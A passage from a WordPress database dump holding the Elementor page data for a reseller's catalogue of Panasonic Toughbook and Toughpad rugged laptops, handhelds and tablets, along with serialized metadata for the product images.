upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><\\/div><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3709,2687,'_elementor_template_type','post'),(3710,2687,'_wp_page_template','template-fullwidth.php'),(3711,2687,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":52},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":51},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":57},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3674,2682,'_elementor_template_type','post'),(3373,2609,'_wp_attached_file','2018/12/fz-l1_right_ss.jpg'),(3374,2609,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:519;s:6:\"height\";i:389;s:4:\"file\";s:26:\"2018/12/fz-l1_right_ss.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"fz-l1_right_ss-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"fz-l1_right_ss-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"fz-l1_right_ss-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"fz-l1_right_ss-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"fz-l1_right_ss-20x15.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3375,2610,'_wp_attached_file','2018/12/fz-m1_image_01_new_win10.jpg'),(3376,2610,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:584;s:6:\"height\";i:389;s:4:\"file\";s:36:\"2018/12/fz-m1_image_01_new_win10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"fz-m1_image_01_new_win10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"fz-m1_image_01_new_win10-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:36:\"fz-m1_image_01_new_win10-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:36:\"fz-m1_image_01_new_win10-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:34:\"fz-m1_image_01_new_win10-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3377,2611,'_wp_attached_file','2018/12/fz-g1mk5_us_image02_ss.jpg'),(3378,2611,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:519;s:6:\"height\";i:389;s:4:\"file\";s:34:\"2018/12/fz-g1mk5_us_image02_ss.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"fz-g1mk5_us_image02_ss-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"fz-g1mk5_us_image02_ss-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"fz-g1mk5_us_image02_ss-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"fz-g1mk5_us_image02_ss-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"fz-g1mk5_us_image02_ss-20x15.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:15;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3379,2612,'_wp_attached_file','2018/12/tb_fz_a2_hero_front-1.png'),(3380,2612,'_wp_attac